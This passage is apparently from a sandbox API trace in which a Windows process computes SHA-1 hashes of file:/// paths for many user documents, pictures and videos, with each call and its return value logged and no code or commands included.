(hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 0x62 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 0x62 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc6, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 0x62 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp/") returned 0x63 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc8, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 0x36 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 0x36 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 0x36 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf/") returned 0x37 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x70, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 0x46 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 0x46 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 0x46 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf/") returned 0x47 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.017] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.017] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 0x58 [0086.017] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.017] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 0x58 [0086.017] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb2, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 0x58 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png/") returned 0x59 [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb4, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 0x33 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 0x33 [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x68, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 0x33 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf/") returned 0x34 [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 0x39 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 0x39 [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 0x39 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx/") returned 0x3a [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 0x32 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 0x32 [0086.018] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x66, dwFlags=0x0) returned 1 [0086.018] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.018] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.018] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 0x32 [0086.018] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png/") returned 0x33 [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x68, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 0x3e [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 0x3e [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 0x3e [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg/") returned 0x3f [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 0x59 [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 0x59 [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb4, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 0x59 [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg/") returned 0x5a [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb6, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 0x67 [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 0x67 [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd0, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 0x67 [0086.019] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.019] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots/") returned 0x68 [0086.019] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd2, dwFlags=0x0) returned 1 [0086.019] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.019] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 0x4a [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 0x4a [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x96, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 0x4a [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf/") returned 0x4b [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x98, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 0x3b [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 0x3b [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 0x3b [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv/") returned 0x3c [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 0x4b [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 0x4b [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x98, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 0x4b [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx/") returned 0x4c [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0086.020] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.020] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 0x43 [0086.020] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.020] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 0x43 [0086.020] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 0x43 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg/") returned 0x44 [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 0x45 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 0x45 [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 0x45 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx/") returned 0x46 [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 0x49 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 0x49 [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x94, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 0x49 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf/") returned 0x4a [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x96, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 0x78 [0086.021] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 0x78 [0086.021] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf2, dwFlags=0x0) returned 1 [0086.021] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.021] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.021] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 0x78 [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png/") returned 0x79 [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf4, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 0x43 [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen 